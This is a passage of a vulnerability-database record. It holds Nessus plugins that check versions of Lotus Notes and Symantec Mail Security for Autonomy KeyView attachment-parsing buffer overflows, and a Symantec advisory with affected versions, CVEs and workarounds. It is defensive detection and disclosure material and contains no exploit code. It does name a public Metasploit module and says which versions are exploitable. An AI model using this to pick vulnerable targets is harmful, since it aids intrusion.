48021\n );\n script_xref(name:\"CERT\", value:\"126159\");\n script_xref(name:\"EDB-ID\", value:\"17448\");\n script_xref(name:\"Secunia\", value:\"44624\");\n\n script_name(english:\"IBM Lotus Notes Attachment Handling Multiple Buffer Overflows\");\n script_summary(english:\"Checks file version of kvgraph.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application that is affected by\nmultiple buffer overflow vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The file attachment viewer component included with the instance of\nLotus Notes installed on the remote Windows host is reportedly\naffected by several buffer overflow vulnerabilities that can be\ntriggered when handling attachments of various types.\n\nBy sending a specially crafted attachment to users of the affected\napplication and getting them to double-click and view the attachment,\nan attacker may be able to execute arbitrary code subject to the\nprivileges under which the affected application runs.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/518139\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/518131\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/518138\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/518137\");\n # https://www.secureauth.com/labs/advisories/LotusNotes-XLS-viewer-heap-overflow\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c85aef3a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2011/May/178\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2011/May/179\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2011/May/181\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2011/May/182\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/archive/1/518120/100/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg21500034\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either Install Interim Fix 1 for Notes 8.5.2 Fix Pack 2 / 8.5.2 Fix\nPack 3 or upgrade to 8.5.3. Alternatively, disable attachment viewers.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2011-0548\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:lotus_notes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\",\"lotus_notes_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\",\"SMB/Lotus_Notes/Installed\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\n\nkb_base = \"SMB/Lotus_Notes/\";\n\nversion = get_kb_item_or_exit(kb_base + 'Version');\npath = get_kb_item_or_exit(kb_base + 'Path');\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\n# Retrieve the appropriate share.\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\n# Get a list of user data dirs on the system\nregistry_init();\nhku = registry_hive_connect(hive:HKEY_USERS, exit_on_fail:TRUE);\nif (empty_or_null(hku))\n{\n RegCloseKey(handle:hku);\n close_registry();\n audit(AUDIT_REG_FAIL);\n}\nkey_h = RegOpenKey(handle:hku, mode:MAXIMUM_ALLOWED);\nif (!empty_or_null(key_h))\n{\n reginfo = RegQueryInfoKey(handle:key_h);\n}\n\nif (!empty_or_null(reginfo))\n{\n datadirs = [];\n registry_init();\n for (i = 0; i < reginfo[1]; i++)\n {\n subkey = RegEnumKey(handle:key_h, index:i);\n key = subkey + \"\\Software\\IBM\\Notes\\Installer\\DATADIR\";\n datadir = get_registry_value(handle:hku, item:key);\n if (empty_or_null(datadir))\n {\n key = subkey + \"\\Software\\Lotus\\Notes\\Installer\\DATADIR\";\n datadir = get_registry_value(handle:hku, item:key);\n }\n if (!empty_or_null(datadir) && subkey =~ '^S-1-5-21-[0-9\\\\-]+$')\n {\n datadirs[max_index(datadirs)] = datadir;\n }\n }\n RegCloseKey(handle:key_h);\n RegCloseKey(handle:hku);\n close_registry();\n}\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\n# Split the software's location into components.\nbase = preg_replace(string:path, pattern:\"^(.+)\\\\$\", replace:\"\\1\");\nshare = preg_replace(string:base, pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\");\npath = preg_replace(string:base, pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\");\nfound = FALSE;\n\n# Connect to the share software is installed on.\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, share);\n}\nif (!empty_or_null(datadirs))\n{\n foreach datadir (datadirs)\n {\n file = preg_replace(string:datadir, pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\") + \"\\KeyView.ini\";\n file_h = CreateFile(\n file:file,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n if (!empty_or_null(file_h))\n {\n found = TRUE;\n }\n }\n file = preg_replace(string:base, pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\") + \"\\KeyView.ini\";\n file_h = CreateFile(\n file:file,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n if (!empty_or_null(file_h))\n {\n found = TRUE;\n }\n CloseFile(handle:file_h);\n\n if (!found)\n {\n NetUseDel();\n audit(AUDIT_INST_VER_NOT_VULN, \"IBM Notes\");\n }\n}\n\n# Try and read one of the vulnerable files.\nfile_h = CreateFile(\n file:path + \"\\xlssr.dll\",\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n);\nif (isnull(file_h))\n{\n NetUseDel();\n audit(AUDIT_INST_VER_NOT_VULN, \"IBM Notes\");\n}\n\nversion = GetFileVersion(handle:file_h);\nCloseFile(handle:file_h);\nNetUseDel();\nif (isnull(version)) exit(1, \"Failed to extract the file version from '\" + base + \"\\xlssr.dll'.\");\n\n# Check if the DLL file is vulnerable.\nfix = \"8.5.23.11191\";\nver = join(version, sep:\".\");\nif (ver_compare(ver:ver, fix:fix) >= 0)\n audit(AUDIT_INST_VER_NOT_VULN, \"IBM Notes\");\n\n# Report our findings.\nreport =\n '\\n File : ' + base + \"\\xlssr.dll\" +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\nsecurity_report_v4(port:445, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T07:10:36", "description": "The file attachment filter component included with the instance of\nSymantec Mail Security installed on the remote Windows host is\nreportedly affected by multiple buffer overflow vulnerabilities that can\nbe triggered when handling attachments of various types. \n\nBy sending an email with a specially crafted attachment through a\nvulnerable server, an attacker could execute arbitrary code subject to\nthe privileges under which the affected daemon runs.", "edition": 25, "published": "2011-10-28T00:00:00", "title": "Symantec Mail Security Autonomy Verity Keyview Filter Vulnerabilities (SYM11-013)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0337", "CVE-2011-1215", "CVE-2011-1214", "CVE-2011-0338", "CVE-2011-1218", "CVE-2011-1512", "CVE-2011-1216", "CVE-2011-0339", "CVE-2011-1213"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:symantec:mail_security"], "id": "SYMANTEC_SYM_11-013.NASL", "href": "https://www.tenable.com/plugins/nessus/56666", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56666);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n\n script_cve_id(\n \"CVE-2011-0337\",\n \"CVE-2011-0338\",\n \"CVE-2011-0339\",\n \"CVE-2011-1213\",\n \"CVE-2011-1214\",\n \"CVE-2011-1215\",\n \"CVE-2011-1216\",\n \"CVE-2011-1218\",\n \"CVE-2011-1512\"\n );\n script_bugtraq_id(\n 48016,\n 48017,\n 48018,\n 48019,\n 48020,\n 48021,\n 49898,\n 49899,\n 49900\n );\n\n script_name(english:\"Symantec Mail Security Autonomy Verity Keyview Filter Vulnerabilities (SYM11-013)\");\n script_summary(english:\"Checks version of Symantec Mail Security\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a mail security application installed that\nis affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The file attachment filter component included with the instance of\nSymantec Mail Security installed on the remote Windows host is\nreportedly affected by multiple buffer overflow vulnerabilities that can\nbe triggered when handling attachments of various types. \n\nBy sending an email with a specially crafted attachment through a\nvulnerable server, an attacker could execute arbitrary code subject to\nthe privileges under which the affected daemon runs.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?36cf5cc9\");\n script_set_attribute(attribute:\"solution\", value:\n\"If using Symantec Mail Security for Domino, upgrade to version 7.5.12 /\n8.0.9. \n\nIf using Symantec Mail Security for Microsoft Exchange, upgrade to\nversion 6.0.13 / 6.5.6.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/05/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/28\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:mail_security\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"sms_for_domino.nasl\", \"sms_for_msexchange.nasl\");\n script_require_keys(\"Symantec_Mail_Security/Installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"Symantec_Mail_Security/Installed\");\n\ndirs = make_list(\"Domino\", \"Exchange\");\n\n# Ensure that the affected software is installed.\nbackend = NULL;\nforeach type (dirs)\n{\n if (get_kb_item(\"SMB/SMS_\" + type + \"/Installed\"))\n {\n backend = type;\n break;\n }\n}\nif (isnull(backend) || (backend != 'Exchange' && backend != 'Domino')) exit(0, \"Neither Symantec Mail Security for Domino nor Exchange is installed on the remote host.\");\n\npath = get_kb_item_or_exit(\"SMB/SMS_\" + type + \"/Path\");\nversion = get_kb_item_or_exit(\"SMB/SMS_\" + type + \"/Version\");\n\nif (\n (\n backend == 'Exchange' &&\n (\n (version =~ '^6\\\\.0\\\\.' && ver_compare(ver:version, fix:'6.0.13', strict:FALSE) == -1) ||\n (version =~ '^6\\\\.[1-5]\\\\.' && ver_compare(ver:version, fix:'6.5.6', strict:FALSE) == -1)\n )\n ) ||\n (\n backend == 'Domino' &&\n (\n (version =~ '^7\\\\.5\\\\.' && ver_compare(ver:version, fix:'7.5.12', strict:FALSE) == -1) ||\n (version =~ '^8\\\\.' && ver_compare(ver:version, fix:'8.0.9', strict:FALSE) == -1)\n )\n )\n)\n{\n # Report our findings.\n if (report_verbosity > 0)\n {\n if (backend == 'Exchange') fix = '6.0.13 / 6.5.6';\n else fix = '7.5.12 / 8.0.9';\n report =\n '\\n Product : Symantec Mail Security for ' + backend +\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_hole(get_kb_item('SMB/transport'));\n exit(0);\n}\nelse exit(0, 'The Symantec Mail Security for '+backend+' '+version+' install on the host is not affected.');\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2020-12-24T10:42:29", "bulletinFamily": "software", "cvelist": ["CVE-2011-0337", "CVE-2011-0338", "CVE-2011-0339", "CVE-2011-1213", "CVE-2011-1214", "CVE-2011-1215", "CVE-2011-1216", "CVE-2011-1218", "CVE-2011-1512"], "description": "### SUMMARY\n\n \n\nMultiple sources have identified several security issues in Autonomy's Verity Keyview Content Filter libraries. Symantec has updated the Keyview modules being shipped with Symantec products to address these issues.\n\n### AFFECTED PRODUCTS\n\n \n\n**Product**\n\n| \n\n**Version**\n\n| \n\n**Build**\n\n| \n\n**Solution(s)** \n \n---|---|---|--- \n \nSymantec Mail Security for Microsoft Exchange (SMSMSE)\n\n| \n\n6.x\n\n| \n\nAll\n\n| \n\n SMSMSE 6.5.6 or SMSMSE 6.0.13 (see mitigation workarounds below to disable content filtering as an interim) \n \nSymantec Mail Security for Domino (SMSDOM)\n\n| \n\n8.x\n\n| \n\nAll\n\n| \n\nSMSDOM 8.0.9 (see mitigation workarounds below to disable content filtering as an interim) \n \nSymantec Mail Security for Domino\n\n| \n\n7.5.x\n\n| \n\nAll\n\n| \n\nSMSDOM 7.5.12 (see mitigation workarounds below to disable content filtering as an interim) \n \nSymantec Brightmail and Messaging Gateway (SBG/SMG)\n\n| \n\n9.5 and earlier\n\n| \n\nAll\n\n \n\n| \n\nSymantec Messaging Gateway 9.5.1 \n \nSymantec Data Loss Prevention(DLP) Enforce/Detection Servers for Windows\n\n| \n\n10.x and earlier\n\n| \n\nAll\n\n| \n\nSymantec DLP 11.1.1 for Windows \n \nSymantec Data Loss Prevention Enforce/Detection Servers for Linux\n\n| \n\n10.x and earlier\n\n| \n\nAll\n\n| \n\nSymantec DLP 11.1.1 for Linux \n \nSymantec Data Loss Prevention Endpoint Agents\n\n| \n\n10.x and earlier\n\n| \n\nAll\n\n| \n\nSymantec DLP 11.1.1 Agent \n \nSymantec Data Loss Prevention Enforce/Detection Servers for Windows\n\n| \n\n11.x\n\n| \n\nAll\n\n| \n\nSymantec DLP 11.1.1 for Windows \n \nSymantec Data Loss Prevention Enforce/Detection Servers for Linux\n\n| \n\n11.x\n\n| \n\nAll\n\n| \n\nSymantec DLP 11.1.1 for Linux \n \nSymantec Data Loss Prevention Endpoint Agents\n\n| \n\n11.x\n\n| \n\nAll\n\n| \n\nSymantec DLP 11.1.1 Agent \n \n \n\nNOTE: Disabling content filtering as described in the mitigation section below does NOT interfere with the primary functionality of Symantec's products, e.g., anti-virus or anti-spam.\n\n### ISSUES\n\n \n\nMedium to High (based on the CVSS2 scoring below)\n\nHigh \nCVSS V2 9.33 (for SMSME and SMSDOM, running the Autonomy Verity Keyview Filter in-process or out-of-process with application-level privileges.)\n\nImpact: 10 Exploitability 8.588\n\nCVSS V2 Vector AV: N/AC: M/Au: N/C:C/I:C/A:C\n\nMedium\n\nCVSS V2 4.3 (for SBG/SMG and DLP, running the Autonomy Verity Keyview Filter out-of-process with least privileges.)\n\nImpact: 2.862 Exploitability: 8.588\n\nCVSS V2 Vector AV:N/AC:M/Au:N/C:N/I:N/A:P\n\n**CVE ID Assigned**\n\n| \n\n**File Type / KV component**\n\n| \n\n**Credited To**\n\n| \n\n**BID** \n \n---|---|---|--- \n \nCVE-2011-1512\n\n| \n\nExcel Doc/xsslr\n\n| \n\n[CoreLabs Research](<https://www-304.ibm.com/support/docview.wss?uid=swg21500034>)\n\n| \n\n[BID 48017](<http://www.securityfocus.com/bid/48017>) \n \nCVE-2011-1213\n\n| \n\nExcel Doc/xsslr\n\n| \n\n[CoreLabs Research](<https://www-304.ibm.com/support/docview.wss?uid=swg21500034>)\n\n| \n\n[BID 48018](<http://www.securityfocus.com/bid/48018/info>) \n \nCVE-2011-1214\n\n| \n\nLZH Archive/lzhsr\n\n| \n\nBinaryhouse.net working through [iDefense Labs](<http://labs.idefense.com/intelligence/vulnerabilities/>)\n\n| \n\n[BID 48019](<http://www.securityfocus.com/bid/48019>) \n \nCVE-2011-1215\n\n| \n\nRTF attach/rtfsr\n\n| \n\nBinaryhouse.net working through [iDefense Labs](<http://labs.idefense.com/intelligence/vulnerabilities/>)\n\n| \n\n[BID 48020](<http://www.securityfocus.com/bid/48020/info>) \n \nCVE-2011-1216\n\n| \n\nApplix Spreadsheet/assr\n\n| \n\nBinaryhouse.net working through [iDefense Labs](<http://labs.idefense.com/intelligence/vulnerabilities/>)\n\n| \n\n[BID 48021](<http://www.securityfocus.com/bid/48021>) \n \nCVE-2011-1218\n\n| \n\nZip File Viewer/kvarcve\n\n| \n\nBinaryhouse.net working through [iDefense Labs](<http://labs.idefense.com/intelligence/vulnerabilities/>)\n\n| \n\n[BID 48016](<http://www.securityfocus.com/bid/48016/info>) \n \nCVE-2011-0337\n\n| \n\nIchitaro Speed Reader doc/ jtdsr\n\n| \n\n[Secunia Research](<http://secunia.com/research>)\n\n| \n\n[BID 49898](<http://www.securityfocus.com/vulnerabilities>) \n \nCVE-2011-0338 \n\n| \n\nIchitaro Speed Reader doc/jtdsr\n\n| \n\n[Secunia Research](<http://secunia.com/research>)\n\n| \n\n[BID49899](<http://www.securityfocus.com/vulnerabilities>) \n \nCVE-2011-0339\n\n| \n\nIchitaro Speed Reader doc/jtdsr\n\n| \n\n[Secunia Research](<http://secunia.com/research>)\n\n| \n\n[BID49900](<http://www.securityfocus.com/vulnerabilities>) \n \n \n\n| \n\nMultiple File Types\n\n| \n\n[CERT.org](<http://www.kb.cert.org/vuls/id/126159>)\n\n| \n\n \n \n### MITIGATION\n\n \n\n**Details** \nSymantec was notified of multiple security issues to include possible denial of service process crash and potential code execution vulnerabilities identified in several of the file parsing libraries in the Autonomy Verity Keyview Filter shipped with the Symantec products identified above. These vulnerabilities can potentially be targeted during the content filtering process run against maliciously formatted incoming files.\n\n Attempted exploitation results, depending on the product involved in the processing, range from no impact to a crash of the child process with negligible impact, an application crash or, in specific instances, potential elevated privilege application compromise.\n\n \n\n**Symantec Response** \nSymantec product engineers worked closely with Autonomy to obtain and provide updates to address all issues.\n\nSymantec Mail Security for Microsoft Exchange runs the Verity Filter as part of the application process. A successful exploitation attempt could potentially result in a denial of service application crash or possibly a privilege compromise in the context of the application. \n\nSymantec Mail Security for Domino runs the Verity Filter out-of-process by default preventing attack attempts from crashing the application. However, the process runs in the context of the application which could potentially allow a possible privileged application compromise from a successful exploit attempt. \n\nCustomers running Symantec Mail Security for Microsoft Exchange or Symantec Mail Security for Domino should update to the non-vulnerable versions identified above or disable content filtering by following the mitigation workarounds described below until updates can be obtained and deployed.\n\nIn the Symantec BrightMail/Messaging Gateway and Symantec Data Loss Prevention products, the Autonomy Verity KeyView content filtering process has been separated from the Symantec applications (out-of-process) and runs with least privilege. This out-of-process method specifically addresses these types of security concerns.\n\nAny attempt to exploit these issues results in process termination of the offending thread and an error message generated to and handled by the specific application(s). However, non-vulnerable versions of the Verity Filter have been updated and made available to customers. Customers may still disable content filtering through the temporary mitigation workarounds described below until updates can be obtained and deployed.\n\nSymantec knows of no exploitation of or adverse customer impact from these issues.\n\n \n\n**Update Information**\n\nUpdates will be available through customers' normal support/download locations.\n\nSMS for Domino and Microsoft Exchange updates will be available through the [Platinum Support Web Site](<https://www-secure.symantec.com/platinum/login.html>)for Platinum customers or through the [FileConnect](<https://fileconnect.symantec.com/licenselogin.jsp>) -Electronic Software Distribution web site.\n\nSymantec DLP updates will be available for download through [secure file exchange](<https://exftpp.symantec.com/>).\n\n \n\n**Workaround/Mitigations**\n\n**Temporary Workaround to disable content filtering in Symantec Mail Security for Microsoft Exchange** \nInstallations of SMS for Microsoft Exchange that _do not_ utilize the Content Filtering capabilities of the product _are not_ susceptible. SMS for Microsoft Exchange would be susceptible only if the attachment content scanning option is enabled. \n \nAs an interim workaround, administrators may fully disable content filtering rules that contain parameters specifying scanning of attachment content. The rules do not need to be deleted, only disabled until the updated release is installed.\n\n * To disable the content filtering rules for SMS for Microsoft Exchange:\n * Select the \"Policies\" tab and then choose \"Content Filtering\" to display the list of currently enabled rules\n * Ensure that all rules using attachment content are \"disabled\"\n * Or, Instead of disabling content filtering altogether, the administrator can rename only the affected readers until updates can be installed:\n * Go to the Verity bin folder of the product installation, e.g. SMSMSE -> Verity -> bin\n * Locate the affected binary, e.g. lzhsr.dll\n * Rename the binary, e.g. lzhsr_**disabled**.dll.\n * Content filtering will now NOT be performed for those attachments previously read by the affected reader(s).\n\n \n\n**Temporary Workaround to disable content filtering in Symantec Mail Security for Domino** \nInstallations of SMS for Domino that _do not_ utilize the Content Filtering capabilities of the product _are not_susceptible to this issue. SMS for Domino would be susceptible only if the attachment content scanning option is enabled. \n \nAs an interim workaround, administrators may disable content filtering rules that contain parameters specifying scanning of attachment content. The rules do not need to be deleted, only disabled until an updated release is installed. \n \nTo disable content filtering rules for Symantec Mail Security for Domino\n\n * Select the \"Content Filtering\" tab to display the list of current enabled rules\n * Click on the checkmark to the left of any rules that utilize _attachment content_ filtering, changing it to a red \"X\" disabling the rule\n * Or, Instead of disabling content filtering altogether, the administrator can rename only the affected readers until updates can be installed:\n * Go to the Verity bin folder of the product installation, e.g. SMSDOM -> Server -> Verity -> bin\n * Locate the affected binary, e.g. lzhsr.dll\n * Rename the binary, e.g. lzhsr_disabled.dll.\n * Content filtering will now NOT be performed for those attachments previously read by the affected reader(s).\n\n**Temporary Workaround to disable content filtering in Symantec Brightmail Gateway or Symantec Messaging Gateway** \nRisk from these issues are limited on installations of Symantec Brightmail or Symantec Messaging Gateway in which the attachment content scanning option is enabled. However, installations that do not utilize the Content Filtering capabilities of the product _are not_ affected by these issues. \n \nAs an interim workaround, administrators unable to upgrade to the recommended solution may disable content filtering rules that contain parameters that specify scanning of attachment content. The rules do not need to be deleted, only disabled until the updated release is installed. \n \nTo disable the content filtering rules for either Symantec Brightmail Gateway or Symantec Messaging Gateway:\n\n * Log into the management console and navigate to the SMTP Scanning Settings screen\n * Disable the item \"Enable searching of non-plain text attachments for words in dictionaries\", by deselecting the checkbox, and saving\n * Disable any Compliance policies with a condition:\n * \"If any part of the message matches\" (or \"does not match\") a regular expression, pattern or Record Resource.\n * \"If text in Attachment content part of the message . . . \"\n\n \n\n**Best Practices** \nAs part of normal best practices, Symantec strongly recommends:\n\n * Restrict access to administration or management systems to privileged users.\n * Restrict remote access, if required, to trusted/authorized systems only.\n * Run under the principle of least privilege where possible to limit the impact of exploit by threats.\n * Keep all operating systems and applications updated with the latest vendor patches.\n * Follow a multi-layered approach to security. Run both firewall and anti-malware applications, at a minimum, to provide multiple points of detection and protection to both inbound and outbound threats.\n * Deploy network and host-based intrusion detection systems to monitor network traffic for signs of anomalous or suspicious activity. This may aid in detection of attacks or malicious activity related to exploitation of latent vulnerabilities\n\n### ACKNOWLEDGEMENTS\n\n \n\nWill Dormann and Jared Allar with [CERT](<http://www.cert.org/>)/CC identified multiple issues in the Autonomy Keyview module. Additional issues in the Autonomy Keyview module were identified by Secunia [Research](<http://secunia.com/research>), Binaryhouse.net working through iDefense [Labs](<http://labs.idefense.com/intelligence/vulnerabilities/>) and [Core](<http://www.coresecurity.com/content/corelabs>) Technologies.\n\n### REFERENCES\n\n \n\n**BID:** Security Focus, [http://www.securityfocus.com](<http://www.securityfocus.com/>), has assigned a Bugtraq ID (BID) to these issues for inclusion in the Security Focus vulnerability database. BIDs have been assigned as indicated below \n**CVE:** These issues are a candidate for inclusion in the CVE list ([http://cve.mitre.org](<http://cve.mitre.org/>)), which standardizes names for security problems. The CVE initiative has assigned CVE IDs as indicated below.\n", "modified": "2020-03-05T20:50:44", "published": "2011-10-06T08:00:00", "id": "SMNTC-1236", "href": "", "type": "symantec", "title": "Multi-Vendor Autonomy Verity Keyview Filter Multiple Issues", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
